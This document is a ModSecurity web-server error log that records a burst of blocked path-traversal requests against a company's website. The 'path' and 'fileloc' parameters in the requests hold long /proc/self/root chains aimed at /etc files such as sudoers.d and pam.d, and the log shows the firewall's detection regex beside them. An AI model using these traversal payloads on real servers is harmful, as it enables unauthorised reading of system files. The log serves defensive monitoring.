[Thu Mar 19 04:49:03.869572 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:43842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqbxkFeYa1D6dYQnC9ngAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:49:06.673962 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.241.31:43812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqceoXxyEfFpUF8f_f5gAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:06.675232 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:43844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqcvu8EFLIOrSqIpttEAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:49:10.042981 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.241.31:41148] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqdhkFeYa1D6dYQnC9pgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:10.197297 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:43854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqdgkwaGbbGflqUZCEKgAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:49:12.595374 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.243.128:59410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqeMdf6f5d65gmYZRCugAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:49:31.520258 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.241.31:41156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqi8df6f5d65gmYZRC3AAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:34.748676 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:58090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqjeoXxyEfFpUF8f_f7wAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:36.388356 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.228.61:60628] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abuqkOyqAr6etmhZHNoy9wAAAE4"]
[Thu Mar 19 04:49:38.319661 2026] [:error] [pid 19093:tid 140411616036608] [client 74.7.241.31:58098] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqkl_V7PWP6ixUYl6LggAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:41.841384 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:52314] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqlda6ubjKNq_cu4YRMAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 04:49:50.312110 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:52316] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqnuoXxyEfFpUF8f_gBQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:49:54.070782 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:56320] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqogkwaGbbGflqUZCETAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:49:58.847134 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:56322] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqpsdf6f5d65gmYZRC8gAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:05.001798 2026] [:error] [pid 19093:tid 140411733534464] [client 74.7.241.31:34232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqrV_V7PWP6ixUYl6LmAAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:50:07.171072 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:34244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqr-oXxyEfFpUF8f_gDwAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:50:08.555446 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:56182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqsOoXxyEfFpUF8f_gFAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:14.216403 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:56208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqtgbLMZ6AikZjR9Us4AAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:15.247868 2026] [:error] [pid 27293:tid 140411607643904] [client 74.7.243.128:59420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqt_-YZRR_7pZ7nDJcyAAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:15.556044 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.241.31:56210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqt-oXxyEfFpUF8f_gGAAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 04:50:16.550593 2026] [:error] [pid 27403:tid 140411590858496] [client 74.7.243.128:43856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuquBkFeYa1D6dYQnC9uQAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:50:20.826350 2026] [:error] [pid 27403:tid 140411674785536] [client 74.7.241.31:56224] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abuqvBkFeYa1D6dYQnC9vgAAAcg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
